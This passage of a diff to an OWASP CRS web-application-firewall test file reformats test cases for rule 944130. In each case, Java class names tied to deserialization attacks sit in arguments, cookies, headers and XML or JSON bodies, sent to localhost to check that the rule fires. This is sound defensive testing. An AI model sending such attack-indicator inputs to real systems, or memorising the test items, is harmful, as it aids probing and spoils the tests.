"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 125 desc: "Cookie name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 126 desc: "Request header test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 127 desc: "XML attribute value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 128 desc: "XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 129 desc: "Nested XML element value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 130 desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" stages: - 
- stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 131 desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 132 desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 133 desc: "Argument test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 134 desc: "Argument name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - 
output: - log_contains: "id \"944130\"" - - test_title: 944130-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 139 desc: "XML element value includes keyword 
java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + 
log_contains: "id \"944130\"" + - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" 
stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id 
